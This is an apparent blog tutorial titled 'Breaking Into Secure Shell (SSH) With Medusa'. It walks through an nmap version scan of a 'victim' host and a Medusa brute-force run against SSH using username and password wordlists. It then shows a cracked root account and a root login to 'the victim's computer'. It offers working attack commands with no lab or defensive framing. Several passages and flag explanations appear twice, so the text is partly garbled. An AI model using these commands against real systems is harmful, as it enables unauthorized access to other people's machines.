Breaking Into Secure Shell (SSH) With Medusa
Description :
SSH Or Secure Shell is a network protocol where the client can exchange data through a secure network between the two devices as a remote network. is widely used in Operation systems GNU Linux and Unix.
About Medusa :
medusa is a cracker tools with fast service to display the password as "SSH, FTP, HTTP, MySQL, Telnet, VNC, Web Forms and more.
Equipments:
1. Medusa
2. Nmap
Scan victim host using Nmap
# nmap -sV xxx.xxx.xxx
-sV : Probe open ports to determine service/version info
xxx.xxx.xxx.xxx : ip-victim
seen in the picture above, the SSH service port 22 open. so, we can do the exploitable
# medusa -h xxx.xxx.xxx.xxx -U USER.txt -P PASS.txt -e ns -M ssh -v 4
-h : Target hostname or IP address
-U : File containing usernames
-P : File containing passwords
-e : Additional password checks ([n] No Password, [s] Password = Username)
-M : Name of the module to execute
-P : File containing passwords
-e : Additional password checks ([n] No Password, [s] Password = Username)
-M : Name of the module to execute
-v : Verbose level
ACCOUNT FOUND =))
User is a root
password is a r00t
Now, let's get the ssh login :
Success =)) we have access into the victim's computer
NOTE : at its base is not as easy as in the testing that I did, that you have to prepare is a wordlist and luck.
regards
Hidemichi-Hiroyuki a.k.a [H2]
User is a root
password is a r00t
Now, let's get the ssh login :
# ssh root@xxx.xxx.xxx.xxx
Success =)) we have access into the victim's computer
NOTE : at its base is not as easy as in the testing that I did, that you have to prepare is a wordlist and luck.
regards
Hidemichi-Hiroyuki a.k.a [H2]
Comments
Post a Comment
Do Not Fuckin Spamming